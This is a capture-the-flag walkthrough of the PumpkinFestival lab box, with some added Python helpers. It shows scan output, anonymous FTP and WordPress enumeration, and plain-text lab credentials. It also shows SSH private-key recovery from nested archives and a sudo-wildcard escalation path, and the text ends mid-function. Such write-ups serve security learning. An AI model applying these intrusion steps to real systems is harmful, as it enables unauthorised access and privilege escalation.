PumpkinFestival Box

Information Gathering

```
┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.140
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-10 02:47 EDT
Nmap scan report for pumpkins.local (192.168.56.140)
Host is up (0.00016s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
6880/tcp open unknown
MAC Address: 08:00:27:FA:92:8E (Oracle VirtualBox virtual NIC)
```

Ports 21, 80 and 6880 are open.

```
┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ sudo nmap -sT -sV -sC -O -p21,80,6880 192.168.56.140
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-10 02:49 EDT
Nmap scan report for pumpkins.local (192.168.56.140)
Host is up (0.00046s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.56.106
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 4096 Jul 12 2019 secret
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Pumpkin Festival – PumpkinToken : 06c3eb12ef2389e2752335...
|_http-generator: WordPress 4.9.3
6880/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 eb:cb:da:b3:be:b6:c8:0a:8b:6e:d5:bc:51:f7:9c:11 (DSA)
| 2048 19:6b:6e:d3:8a:fa:a9:73:05:5e:ac:af:28:ff:55:b8 (RSA)
| 256 00:a0:f2:8c:5e:a7:7e:7b:7b:d4:72:c3:ad:41:79:3b (ECDSA)
|_ 256 aa:04:61:9a:ca:19:90:c3:55:3c:fc:cc:1a:05:be:3f (ED25519)
MAC Address: 08:00:27:FA:92:8E (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Port 21 allows anonymous login. Port 80 is served by Apache, the page title contains a PumpkinToken, the site runs WordPress 4.9.3, and the operating system is Ubuntu. Next, while nmap's vulnerability scripts run, let's look at the files on FTP.

```
┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ ftp 192.168.56.140
Connected to 192.168.56.140.
220 Welcome to Pumpkin's FTP service.
Name (192.168.56.140:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||28051|).
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jul 12 2019 secret
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> binary
200 Switching to Binary mode.
ftp> cd secret
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||57147|).
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 48 Jul 12 2019 token.txt
226 Directory send OK.
```

```
┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ cat token.txt
PumpkinToken : 2d6dbbae84d724409606eddd9dd71265
# First PumpkinToken
```

That gives us one PumpkinToken.

```
┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ sudo nmap --script=vuln -p21,80,6880 192.168.56.140
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-10 02:50 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for pumpkins.local (192.168.56.140)
Host is up (0.00046s latency).

PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum:
| /wp-login.php: Possible admin folder
| /: WordPress version: 4.9.3
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
|_ /readme.html: Interesting, a readme.
6880/tcp open unknown
MAC Address: 08:00:27:FA:92:8E (Oracle VirtualBox virtual NIC)
```

The nmap vulnerability scan lists some WordPress paths and files.

Looking at the Website

"PumpkinTokens can help you get to your pumpkins." This may be hinting that the PumpkinToken values are passwords, though we are collecting rather a lot of PumpkinTokens. Two usernames, jack and harry, also appear on this page.

Looking at the page source reveals

```
PumpkinToken : 45d9ee7239bc6b0bb21d3f8e1c5faa52
# Second PumpkinToken
```

However, the page title reported by nmap also contained a PumpkinToken, and that one does not appear in this page source.

Directory Brute-forcing

Let's brute-force directories.

```
┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ sudo dirsearch -u http://192.168.56.140/
[sudo] password for kali:

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.56.140/-_23-09-10_03-08-01.txt

Error Log: /root/.dirsearch/logs/errors-23-09-10_03-08-01.log

Target: http://192.168.56.140/

[03:08:01] Starting:
[03:08:02] 403 - 292B - /.ht_wsr.txt
[03:08:02] 403 - 295B - /.htaccess.bak1
[03:08:02] 403 - 297B - /.htaccess.sample
[03:08:02] 403 - 295B - /.htaccess.orig
[03:08:02] 403 - 295B - /.htaccess_orig
[03:08:02] 403 - 296B - /.htaccess_extra
[03:08:02] 403 - 293B - /.htaccess_sc
[03:08:02] 403 - 294B - /.htaccessOLD2
[03:08:02] 403 - 295B - /.htaccess.save
[03:08:02] 403 - 293B - /.htaccessOLD
[03:08:02] 403 - 285B - /.htm
[03:08:02] 403 - 286B - /.html
[03:08:02] 403 - 293B - /.htaccessBAK
[03:08:02] 403 - 295B - /.htpasswd_test
[03:08:02] 403 - 292B - /.httr-oauth
[03:08:02] 403 - 291B - /.htpasswds
[03:08:03] 403 - 285B - /.php
[03:08:03] 403 - 286B - /.php3
[03:08:21] 301 - 313B - /img -> http://192.168.56.140/img/
[03:08:21] 200 - 1KB - /index.html
[03:08:30] 200 - 102B - /robots.txt
[03:08:31] 403 - 294B - /server-status
[03:08:31] 403 - 295B - /server-status/
[03:08:33] 301 - 315B - /store -> http://192.168.56.140/store/
[03:08:35] 301 - 315B - /users -> http://192.168.56.140/users/
[03:08:35] 403 - 287B - /users/
```

The content of robots.txt is as follows:

```
User-agent: * 
Disallow: /wordpress/
Disallow: /tokens/
Disallow: /users/
Disallow: /store/track.txt
```

Visiting them, only /store/track.txt is accessible: /tokens/ and /users/ return 403, and /wordpress/ returns 404. The content of /store/track.txt is:

```
Hey Jack!

Thanks for choosing our local store. Hope you like the services.
Tracking code : 2542 8231 6783 486

-Regards
admin@pumpkins.local
```

I don't yet know what to do with the tracking code, so note it down for now. The email domain is interesting; it is probably the site's virtual-host name. Add a mapping from this domain to the IP in the hosts file, then visit the domain.

Interesting: this yields another one, and it is exactly the PumpkinToken from the nmap scan result.

```
PumpkinToken : 06c3eb12ef2389e2752335beccfb2080
# Third PumpkinToken
```

```
┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ sudo dirsearch -u http://pumpkins.local/

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/pumpkins.local/-_23-09-10_03-16-02.txt

Error Log: /root/.dirsearch/logs/errors-23-09-10_03-16-02.log

Target: http://pumpkins.local/

[03:16:02] Starting:
[03:16:04] 403 - 292B - /.ht_wsr.txt
[03:16:04] 403 - 295B - /.htaccess.bak1
[03:16:04] 403 - 297B - /.htaccess.sample
[03:16:04] 403 - 295B - /.htaccess.save
[03:16:04] 403 - 295B - /.htaccess_orig
[03:16:04] 403 - 293B - /.htaccessBAK
[03:16:04] 403 - 293B - /.htaccess_sc
[03:16:04] 403 - 294B - /.htaccessOLD2
[03:16:04] 403 - 295B - /.htaccess.orig
[03:16:04] 403 - 293B - /.htaccessOLD
[03:16:04] 403 - 286B - /.html
[03:16:04] 403 - 296B - /.htaccess_extra
[03:16:04] 403 - 285B - /.htm
[03:16:04] 403 - 291B - /.htpasswds
[03:16:04] 403 - 295B - /.htpasswd_test
[03:16:04] 403 - 292B - /.httr-oauth
[03:16:05] 403 - 285B - /.php
[03:16:05] 403 - 286B - /.php3
[03:16:24] 301 - 0B - /index.php -> http://pumpkins.local/
[03:16:24] 301 - 0B - /index.php/login/ -> http://pumpkins.local/login/
[03:16:25] 200 - 20KB - /license.txt
[03:16:32] 200 - 642B - /readme.html
[03:16:33] 403 - 295B - /server-status/
[03:16:33] 403 - 294B - /server-status
[03:16:40] 301 - 318B - /wp-admin -> http://pumpkins.local/wp-admin/
[03:16:40] 200 - 0B - /wp-content/
[03:16:40] 302 - 0B - /wp-admin/ -> http://pumpkins.local/wp-login.php?redirect_to=http%3A%2F%2Fpumpkins.local%2Fwp-admin%2F&reauth=1
[03:16:40] 301 - 320B - /wp-content -> http://pumpkins.local/wp-content/
[03:16:40] 400 - 1B - /wp-admin/admin-ajax.php
[03:16:40] 500 - 3KB - /wp-admin/setup-config.php
[03:16:40] 200 - 0B - /wp-config.php
[03:16:40] 200 - 1KB - /wp-admin/install.php
[03:16:40] 403 - 317B - /wp-content/plugins/akismet/admin.php
[03:16:40] 403 - 319B - /wp-content/plugins/akismet/akismet.php
[03:16:40] 500 - 0B - /wp-content/plugins/hello.php
[03:16:40] 200 - 967B - /wp-content/uploads/
[03:16:40] 301 - 321B - /wp-includes -> http://pumpkins.local/wp-includes/
[03:16:40] 500 - 0B - /wp-includes/rss-functions.php
[03:16:40] 200 - 0B - /wp-cron.php
[03:16:40] 200 - 40KB - /wp-includes/
[03:16:40] 200 - 2KB - /wp-login.php
[03:16:40] 302 - 0B - /wp-signup.php -> http://pumpkins.local/wp-login.php?action=register
[03:16:40] 405 - 42B - /xmlrpc.php

Task Completed
```

Check each of these in turn.

Another one:

```
PumpkinToken : 5ff346114d634a015ce413e1bc3d8d71
# Fourth PumpkinToken
```

The readme.html response is a bit odd: it carries no PumpkinToken hint. Note it down for now.

The uploads directory only contains one image and is a standard WordPress path. Just in case, I downloaded the image and examined it locally; there does not appear to be any steganography.

/wp-includes/ likewise only holds ordinary files, with no hidden PumpkinToken.

The brute-force results include a registration page. I tried registering, but since this is not a real site, no registration email ever arrives. As it is a WordPress site, let's try wpscan.

```
┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ wpscan --url http://pumpkins.local/ -e ap,u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | \_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.24
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://pumpkins.local/ [192.168.56.140]
[+] Started: Sun Sep 10 03:24:14 2023

Interesting Finding(s):

[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.7 (Ubuntu)
| - X-Powered-By: PHP/5.5.9-1ubuntu4.29
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://pumpkins.local/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://pumpkins.local/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Registration is enabled: http://pumpkins.local/wp-login.php?action=register
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://pumpkins.local/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://pumpkins.local/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.3 identified (Insecure, released on 2018-02-05).
| Found By: Rss Generator (Passive Detection)
| - http://pumpkins.local/?feed=rss2, <generator>https://wordpress.org/?v=4.9.3</generator>
| - http://pumpkins.local/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.9.3</generator>

[+] WordPress theme in use: twentyseventeen
| Location: http://pumpkins.local/wp-content/themes/twentyseventeen/
| Last Updated: 2023-03-29T00:00:00.000Z
| Readme: http://pumpkins.local/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.2
| Style URL: http://pumpkins.local/wp-content/themes/twentyseventeen/style.css?ver=4.9.3
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://pumpkins.local/wp-content/themes/twentyseventeen/style.css?ver=4.9.3, Match: 'Version: 1.4'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <======================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] morse
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] loly
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] loly2
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
```

loly and loly2 are the usernames I registered, so this gives us two real usernames: admin and morse.

Base62 Encoding

I was stuck here for a long time. Sometimes familiarity with the scenario isn't enough; you also need to be flexible enough in your thinking. It looked as though I had done everything I could (apart from brute-forcing: I tried the collected usernames against the 10,000 most common passwords with no result, and a rockyou.txt run that went on all night did not finish). The first key point here is readme.html:

```
K82v0SuvV1En350M0uxiXVRTmBrQIJQN78s
```

I also tried this string as a password against both FTP and WordPress logins, with no success. In fact, none of the usual decodings give the answer here, but what frustrated me was that I failed to judge the value of this string properly and simply treated it as a password; I also fed the PumpkinTokens in as passwords during brute-forcing, which was mostly wasted effort.

Using the From Base62 - CyberChef (gchq.github.io) operation and trying the different decodings one after another, it decoded successfully.
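The lesson of this section is to test a suspicious string against encodings before treating it as a password. As an added example (not from the original post or from CyberChef), the Python below tries hex, Base64, Base32 and big-integer Base62 with the 0-9A-Za-z alphabet that CyberChef's From Base62 uses by default, and keeps only the decodings that yield printable text; the sample strings are constructed, not the one from the box.

```python
import base64
import binascii
import string

# Alphabet CyberChef's "From Base62" uses by default: 0-9, A-Z, a-z
BASE62_ALPHABET = string.digits + string.ascii_uppercase + string.ascii_lowercase


def base62_decode(text, alphabet=BASE62_ALPHABET):
    """Decode a Base62 string as one big-endian integer and return its bytes.
    Leading zero bytes are not representable in this scheme (same as in
    CyberChef), so they are not restored."""
    if len(alphabet) != 62 or len(set(alphabet)) != 62:
        raise ValueError("alphabet must contain 62 distinct characters")
    value = 0
    for ch in text:
        idx = alphabet.find(ch)
        if idx < 0:
            raise ValueError(f"character {ch!r} is not in the Base62 alphabet")
        value = value * 62 + idx
    length = max(1, (value.bit_length() + 7) // 8)
    return value.to_bytes(length, "big")


def base62_encode(data, alphabet=BASE62_ALPHABET):
    """Inverse of base62_decode; used here to build constructed test input."""
    value = int.from_bytes(data, "big")
    if value == 0:
        return alphabet[0]
    digits = []
    while value:
        value, rem = divmod(value, 62)
        digits.append(alphabet[rem])
    return "".join(reversed(digits))


def _printable(data):
    return bool(data) and all(32 <= b < 127 or b in b"\t\r\n" for b in data)


def candidate_decodings(text):
    """Try hex, Base64, Base32 and Base62 on a string and keep only the
    decodings that produce printable ASCII. Returns {encoding: decoded}."""
    attempts = {
        "hex": bytes.fromhex,
        "base64": lambda t: base64.b64decode(t, validate=True),
        "base32": base64.b32decode,
        "base62": base62_decode,
    }
    found = {}
    for name, decode in attempts.items():
        try:
            out = decode(text)
        except (ValueError, binascii.Error):
            continue
        if _printable(out):
            found[name] = out.decode("ascii")
    return found


if __name__ == "__main__":
    # Constructed sample, not the string from readme.html
    sample = base62_encode(b"someuser:S0me-Passw0rd!")
    print(sample, "->", candidate_decodings(sample))
```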

That gives us two username/password pairs. When trying to log in over SSH, it turns out this machine does not accept SSH password authentication; it must only allow key-based login.

```
-----------------------------------------------------------------------
Welcome to Mission-Pumpkin
All remote connections to this machine are monitored and recorded
-----------------------------------------------------------------------

jack@192.168.56.140: Permission denied (publickey).
```

To obtain an SSH key we have to return to the key point we skipped earlier. But one of the usernames here is morse, which matches a user from the wpscan results, so let's try logging into the WordPress backend.

morse:Ug0t!TrIpyJ logs in successfully, but the account has limited permissions, and this is not admin's password. Rummaging around, I found only one PumpkinToken, in the Profile page. Let's move on to getting the SSH key.

```
PumpkinToken : 7139e925fd43618653e51f820bc6201b
# Fifth PumpkinToken
```

FTP Brute-forcing

The second key point is the FTP brute-force problem, and this one really... if the next box has the same nasty habit, I expect I'll get stuck here again. There is no way around it: if the wordlist is too big, brute-forcing takes too long; if it is too small, there is no result; and a self-made wordlist is not necessarily effective either.

Here the box author placed the password near the end of rockyou, so brute-forcing takes a very long time.

I simply looked the password up in WP: yrrah

FTP Login

```
┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ ftp 192.168.56.140
Connected to 192.168.56.140.
220 Welcome to Pumpkin's FTP service.
Name (192.168.56.140:kali): harry
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls -alih
229 Entering Extended Passive Mode (|||24552|).
150 Here comes the directory listing.
drwx------ 3 1002 1002 4096 Jul 15 2019 .
drwxr-xr-x 5 0 0 4096 Jul 12 2019 ..
-rw------- 1 1002 1002 8 Jul 15 2019 .bash_history
-rw-r--r-- 1 1002 1002 220 Jul 12 2019 .bash_logout
-rw-r--r-- 1 1002 1002 3637 Jul 12 2019 .bashrc
-rw-r--r-- 1 1002 1002 675 Jul 12 2019 .profile
drwxr-xr-x 3 0 0 4096 Jul 12 2019 Donotopen
-rw-r--r-- 1 0 0 48 Jul 12 2019 token.txt
226 Directory send OK.
```

Look at .bash_history, token.txt and Donotopen in turn.

```
┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ cat .bash_history
ls
exit

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ cat token.txt
PumpkinToken : ba9fa9abf2be9373b7cbd9a6457f374e
# Sixth PumpkinToken
```

Donotopen is a directory. Keep descending into it and eventually there is one file and one directory. Download the file to examine it locally first, then go into the remaining directory.

```
48 bytes received in 00:00 (17.32 KiB/s)
ftp> pwd
Remote directory: /home/harry/Donotopen/NO/NOO/NOOO/NOOOO
ftp> ls
229 Entering Extended Passive Mode (|||46745|).
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Jul 14 2019 NOOOOO
-rw-r--r-- 1 0 0 48 Jul 12 2019 token.txt
226 Directory send OK.
ftp> cd NOOOOO
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||52087|).
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jul 14 2019 NOOOOOO
226 Directory send OK.
ftp> cd NOOOOOO
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||29574|).
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 4357 Jul 14 2019 data.txt
226 Directory send OK.
ftp> get data.txt
local: data.txt remote: data.txt
229 Entering Extended Passive Mode (|||61794|).
150 Opening BINARY mode data connection for data.txt (4357 bytes).
100% |***********************************************************************| 4357 2.03 MiB/s 00:00 ETA
226 Transfer complete.
4357 bytes received in 00:00 (1.60 MiB/s)
```

```
┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ cat token.txt
PumpkinToken : f9c5053d01e0dfc30066476ab0f0564c
# Seventh PumpkinToken
```

Hex in the File Contents

data.txt is more complicated, so I asked ChatGPT.

For this kind of thing it really does help.

```
┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ cp data.txt data.tar

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ tar -xvf data.tar
data
tar: A lone zero block at 8

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ file data
data: bzip2 compressed data, block size = 900k
```

It is yet another compressed file. Once more:

```
┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ tar -xvf data
key
tar: A lone zero block at 25

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ file key
key: POSIX tar archive

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ tar -xvf key
jack
tar: A lone zero block at 22

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ file jack
jack: ASCII text, with very long lines (10106), with no line terminators
```

jack is a text file, but its content is hexadecimal text. The next step is to convert it; for now I take the lazy route and use CyberChef.
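The layering above (a tar holding a bzip2 stream, holding a tar, holding a tar, holding hex text that decodes to a key) can be peeled automatically by sniffing each layer's magic bytes, the same way file(1) identified them. This is an added Python example, not part of the original post; it builds a constructed archive chain around a fake key, so nothing from the box is needed, and it cuts the PEM block out directly rather than relying on strings(1).

```python
import binascii
import bz2
import io
import re
import tarfile

# Matches both "BEGIN OPENSSH PRIVATE KEY" and the older "BEGIN RSA PRIVATE KEY"
PEM_KEY_RE = re.compile(
    rb"-----BEGIN [A-Z ]*PRIVATE KEY-----.*?-----END [A-Z ]*PRIVATE KEY-----", re.S
)
HEX_TEXT_RE = re.compile(rb"\A[0-9a-fA-F\s]+\Z")


def sniff(blob):
    """Identify one layer by its magic bytes (what file(1) reports)."""
    if blob[:3] == b"BZh":
        return "bzip2"
    if len(blob) >= 262 and blob[257:262] == b"ustar":
        return "tar"
    if HEX_TEXT_RE.match(blob) and len(b"".join(blob.split())) % 2 == 0:
        return "hex"
    return "raw"


def unwrap(blob, max_depth=16):
    """Peel container layers until a non-container blob remains.
    Returns (payload, layers); a tar layer is reported as tar[member]."""
    layers = []
    for _ in range(max_depth):
        kind = sniff(blob)
        if kind == "bzip2":
            blob = bz2.decompress(blob)
        elif kind == "tar":
            with tarfile.open(fileobj=io.BytesIO(blob), mode="r:") as tf:
                files = [m for m in tf.getmembers() if m.isfile()]
                if len(files) != 1:
                    raise ValueError(f"expected one file in tar, got {len(files)}")
                kind = f"tar[{files[0].name}]"
                blob = tf.extractfile(files[0]).read()
        elif kind == "hex":
            # Equivalent of `xxd -r -ps`: drop whitespace, decode digit pairs
            blob = binascii.unhexlify(b"".join(blob.split()))
        else:
            layers.append(kind)
            return blob, layers
        layers.append(kind)
    raise ValueError("too many nested layers")


def extract_private_key(blob):
    """Return the PEM private-key block as text (with trailing newline), or
    None if the payload holds no key."""
    m = PEM_KEY_RE.search(blob)
    return None if m is None else m.group(0).decode("ascii") + "\n"


def _tar_bytes(name, payload):
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        info = tarfile.TarInfo(name)
        info.size = len(payload)
        tf.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


# Constructed stand-in for the real key; it is not a usable key
FAKE_KEY = (b"-----BEGIN RSA PRIVATE KEY-----\n"
            b"MIIEconstructedPlaceholderNotARealKey==\n"
            b"-----END RSA PRIVATE KEY-----")


def build_sample_chain():
    """Rebuild the nesting seen on the box: data.txt is a tar holding a bzip2
    stream, which holds a tar ("key") holding a hex text file ("jack")."""
    jack = binascii.hexlify(FAKE_KEY)
    key = _tar_bytes("jack", jack)
    data = bz2.compress(_tar_bytes("key", key))
    return _tar_bytes("data", data)


if __name__ == "__main__":
    payload, layers = unwrap(build_sample_chain())
    print(" -> ".join(layers))
    print(extract_private_key(payload))
```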

SSH Private-Key Login

It turns out to be exactly the private key we want. Write it to a file and log in with it.

```
┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ xxd -r -ps jack > jack.bin

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ strings jack.bin > sshlogin

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ chmod 600 sshlogin

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ ssh -i sshlogin jack@192.168.56.140 -p6880
-----------------------------------------------------------------------
Welcome to Mission-Pumpkin
All remote connections to this machine are monitored and recorded
-----------------------------------------------------------------------
jack@192.168.56.140: Permission denied (publickey).
```

For some reason it still fails. Add -vv to see why.

Found the cause: the classic problem of a newer OpenSSH client no longer accepting the ssh-rsa key type by default. Add the option and continue.

```
┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ ssh -i jackkey.key jack@192.168.56.140 -p 6880 -oPubkeyAcceptedKeyTypes=+ssh-rsa
------------------------------------------------------------------------------
Welcome to Mission-Pumpkin
All remote connections to this machine are monitored and recorded
------------------------------------------------------------------------------

Last login: Tue Jul 16 08:12:07 2019 from 192.168.1.105
-bash: /home/jack/.bash_profile: Permission denied
jack@pumpkin:~$ whoami
jack
jack@pumpkin:~$ id
uid=1000(jack) gid=1000(jack) groups=1000(jack),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
jack@pumpkin:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:fa:92:8e brd ff:ff:ff:ff:ff:ff
inet 192.168.56.140/24 brd 192.168.56.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fefa:928e/64 scope link
valid_lft forever preferred_lft forever
jack@pumpkin:~$ sudo -l
[sudo] password for jack:
Matching Defaults entries for jack on pumpkin:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jack may run the following commands on pumpkin:
(ALL) /home/jack/pumpkins/alohomora*
```

Privilege Escalation via sudo by Creating a File with the Matching Name

The password sudo -l asks for is the WordPress password Ug0t!TrIpyJ. The path in the rule does not exist, so we can try creating a file at that path ourselves.

The * here is in fact a wildcard, so the file can simply be named alohomora.
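The rule is dangerous for three independent reasons: a wildcard in the command path, a location under the user's own writable home directory, and a target that does not exist yet. As an added defensive example (not from the original post), the Python below audits recorded `sudo -l` output for exactly those patterns; the sample rules are constructed, with the jack rule mirroring the one on this box, and the filesystem check is injectable so it runs offline.

```python
import os
import re

# Constructed sample of the "may run" section of `sudo -l`; the first rule
# mirrors the one on this box, the others are made up for contrast
SAMPLE_SUDO_L = """\
User jack may run the following commands on pumpkin:
    (ALL) /home/jack/pumpkins/alohomora*
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
    (ALL) /opt/scripts/backup.sh
    (ALL : ALL) ALL
"""

# (runas) [TAG: ...] command [args]
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$"
)
GLOB_CHARS = "*?["


def audit_rule(cmd, home_dir, path_exists=os.path.exists):
    """Return the list of problems with one sudo command path.
    `path_exists` is injectable so a recorded `sudo -l` can be checked
    without access to the target filesystem."""
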